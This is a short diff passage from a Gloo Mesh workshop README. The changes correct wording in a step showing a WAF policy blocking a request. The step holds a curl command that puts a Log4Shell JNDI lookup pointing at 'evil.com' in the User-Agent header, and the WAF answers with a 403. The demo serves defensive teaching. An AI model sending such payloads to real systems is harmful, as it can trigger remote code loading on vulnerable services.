solo-io/solo-cop/workshops/gloo-mesh-demo/README.md

 EOF
 ```

-4. Try the request again.
+4. Try the previous request again.

 ```sh
 curl -ik -X GET -H "User-Agent: \${jndi:ldap://evil.com/x}" http://$HTTP_GATEWAY_ENDPOINT
 ```

-Note that the is now blocked with the custom intervention message from the WAF policy.
+Note that the request is now blocked with the custom intervention message from the WAF policy.

 ```sh
 HTTP/2 403